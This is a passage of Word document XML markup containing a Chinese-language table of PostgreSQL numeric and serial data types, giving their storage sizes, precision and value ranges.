            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>可变长</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516F76A4" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>用户指定的精度，精确</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3C27438D" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>小数点前</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 131072 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>位；小数点后</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 16383 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="3525621C" w14:textId="77777777" w:rsidTr="00D4520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36082094" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>numeric</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70D6B0AB" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>可变长</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77448754" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>用户指定的精度，精确</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1B08A16C" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>小数点前</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 131072 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>位；小数点后</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 16383 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="4201FF65" w14:textId="77777777" w:rsidTr="00D4520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763196A6" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>real</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676D4D45" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>字节</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673A50B7" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>可变精度，不精确</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433777F6" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>位十进制数字精度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="425C1B9B" w14:textId="77777777" w:rsidTr="00D4520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61AF962A" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>double precision</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2820A63F" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>字节</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07968253" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>可变精度，不精确</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34126FE9" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">15 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>位十进制数字精度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="6E1D22CE" w14:textId="77777777" w:rsidTr="00D4520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629BDA9B" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>smallserial</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101E4939" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>字节</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74EBCC2C" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>自增的小范围整数</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1504A43B" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>到</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 32767</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="06075026" w14:textId="77777777" w:rsidTr="00D4520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6ECD1B97" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>serial</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4DA85947" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>字节</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4E75E883" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>自增整数</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1C65BCC3" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>到</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2147483647</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4520C" w:rsidRPr="00D4520C" w14:paraId="06816FFC" w14:textId="77777777" w:rsidTr="00D4520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619A63F8" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>bigserial</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7AFA1AB3" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
